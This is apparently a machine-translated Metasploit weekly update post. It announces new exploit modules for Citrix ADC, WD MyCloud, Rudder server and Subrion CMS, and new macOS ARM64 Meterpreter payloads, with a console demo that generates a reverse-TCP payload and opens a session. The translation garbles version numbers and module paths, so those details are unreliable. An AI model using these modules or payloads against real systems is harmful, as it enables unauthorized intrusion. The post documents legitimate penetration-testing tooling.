最后更新于2023年8月10日星期四21:19:25 GMT

用这个新的云漏洞在天空中飞行!

This week, 添加了一个新模块,可以在某些版本的西部数据MyCloud硬件中利用身份验证绕过和命令注入. 社区成员提交 Erik Wynter, 该模块获得对目标的访问权限, 尝试绕过身份验证, 验证该操作是否成功, 然后以根权限执行负载. 这适用于2之前的版本.30.196,并且在几个命令中提供了很大的灵活性. See the original PR for more info!

OSX Meterpreter支持M1和M2设备

感谢伟大的工作 usiegl00, Metasploit现在对M1和M2 Arm64设备都有有效负载支持,这些设备运行时不需要在目标机器上安装x64 Rosetta模拟器.

新的有效载荷是:

  • osx / aarch64 meterpreter / reverse_tcp
  • osx / aarch64 / meterpreter_reverse_http
  • osx / aarch64 / meterpreter_reverse_tcp
  • osx / aarch64 / meterpreter_reverse_http

生成有效载荷的示例:

msf6 > use payload/osx / aarch64 / meterpreter_reverse_tcp
msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*]写入812819字节到/Users/user/Desktop/payload_stageless...

在远程主机上执行负载后,会话将打开并可以与:

msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) >
[*]传送第一阶段...(328 bytes)
[*]传送第二阶段...(65536 bytes)
[*]发送阶段(812819字节)到127.0.0.1
[*]计量器第8次会话打开(127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx / aarch64 / meterpreter_reverse_tcp) > sessions -i -1
[*]与5开始互动...

meterpreter > getuid
服务器用户名:demo
meterpreter > sysinfo
计算机:演示.local
操作系统:macOS Ventura (macOS 13).2.0)
架构:arm64
BuildTuple: aarch64-apple-darwin
计量器:aarch64/osx
meterpreter >

Metasploit开始上路了

Next week, Metasploit团队的一部分人将在拉斯维加斯参加黑帽大会, 除了拉斯维加斯和DEF CON. 我们自己的Spencer McIntyre将在Black Hat和DEF CON上展示针对活动目录的一些最新Metasploit功能和工作流程. 一定要过来看看. 我们还会发放当地货币的贴纸.

  • 8月10日(星期四)下午13:00-14:30在商务大厅举行黑帽会议
  • DEF CON将于8月11日(周五)10:00-12:00在委员会会议室举行

新增模块内容(10)

Citrix ADC (NetScaler) Forms SSO Target RCE

作者:道格拉斯·麦基,罗恩·鲍斯,斯宾塞·麦金太尔
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
路径:利用/ freebsd / http / citrix_formssso_target_rce
AttackerKB参考: CVE-2023-3519

描述:这增加了一个针对CVE-2023-3519的漏洞,该漏洞是Citrix ADC中未经认证的RCE. 通过制作一个特制的HTTP GET请求, 类中触发堆栈缓冲区溢出 nsppe 作为根运行的进程.

西部数据MyCloud未经认证的命令注入

作者:埃里克·温特,雷姆科·维默伦,史蒂文·坎贝尔
Type: Exploit
Pull request: #18221 contributed by ErikWynter
路径:利用/ linux / http / wd_mycloud_unauthenticated_cmd_injection
AttackerKB参考: CVE-2018-17153

描述:增加了西部数据MyCloud 2之前的身份验证绕过(CVE-2018-17153)和命令注入(CVE-2016-10108)漏洞的漏洞利用模块.30.196. 该模块首先执行检查以验证目标是否容易受到攻击,方法是尝试利用身份验证绕过,然后注入简单的 echo command. 如果目标被确认是脆弱的, 该模块利用相同的命令注入漏洞以root权限执行负载.

方向舵服务器SQLI远程代码执行

作者:Ege balcyi
Type: Exploit
Pull request: #18205 contributed by EgeBalci
路径:利用/多/ http / rudder_server_sqli_rce
AttackerKB参考: CVE-2023-30625

描述:这增加了一个利用RudderStack的rudder-server中的SQL注入漏洞(CVE-2023-30625)来实现未经身份验证的远程代码执行的漏洞利用模块. 此漏洞影响的版本为1之前版本的rudder-server.3.0-rc.1.

智能subion CMS 4.2.1 -通过认证的文件上传旁路到RCE

作者:felipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
路径:利用/多/ http / subrion_cms_file_upload_rce
AttackerKB参考: CVE-2018-19422

描述:这增加了一个利用Subrion CMS版本4中经过身份验证的文件上传漏洞的利用模块.2.1 and prior. 由于方式上的问题 .htaccess 默认配置为File, 可以将PHP代码上传到web服务器并实现远程代码执行.

AWS实例连接

作者:sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
路径:有效载荷/单打/ cmd / unix / bind_aws_instance_connect

描述:这将添加AWS实例连接会话.

OSX AArch64有效载荷支持

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
路径:有效载荷/单打/ osx / aarch64 / meterpreter_reverse_http

描述:增加了对多个OSX AArch64有效负载的新支持: osx / aarch64 meterpreter / reverse_tcp, osx / aarch64 / meterpreter_reverse_http, osx / aarch64 / meterpreter_reverse_tcp, osx / aarch64 / meterpreter_reverse_http. 这允许在没有安装Rosetta的M1或M2 OSX设备上使用本机有效负载.

增强功能和特性(4)

  • #18223 from adfoster-r7 这个PR修复了在shell会话之间切换时msfconsole命令历史管理的问题.
  • #18239 from h00die —增加已验证的版本号(1).12.1, 1.12.1-RC2, and 1.20.0) to the 利用/多/ http / apache_nifi_processor_rce RCE module.
  • #18249 from adfoster-r7 -在加载Mettle扩展(如扩展API)失败时提供更好的错误消息 extapi.
  • #18255 from adfoster-r7 -从Metasploit docker容器中删除Python2支持,因为它已经正式结束生命, Metasploit不再使用. Python3支持仍然可用.

Bugs fixed (6)

  • #18203 from adfoster-r7 修复了运行 扫描仪/ ssh / libssh_auth_bypass 模块在新版本的Ruby上.
  • #18209 from adfoster-r7 修复了 windows /地方/ bypassuac_comhijack 利用模块,该模块由于语法错误而中断.
  • #18234 from D00Movenok -这修复了64位消息框有效载荷中的一个错误,它将无法执行 user32 还没有加载.
  • #18238 from dwelch-r7 修复了一个设置时 USERNAME, USER_FILE and PASS_FILE 有扫描器模块. 的第一个用户名 USER_FILE 不会对任何密码进行测试吗 PASS_FILE,这是固定的.
  • #18243 from adfoster-r7 -此PR修复了appscan导入会因空证明而失败的问题.
  • #18248 from adfoster-r7 修复运行JSON msfrpc服务时的启动警告.

Documentation

您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.

Get it

与往常一样,您可以使用 msfupdate
自上一篇博文以来,你可以从
GitHub:

If you are a git 用户,可以克隆 Metasploit框架 (主分支)为最新.
要安装fresh而不使用git,您可以使用open-source-only 夜间的安装程序 or the
二进制安装程序 (也包括商业版).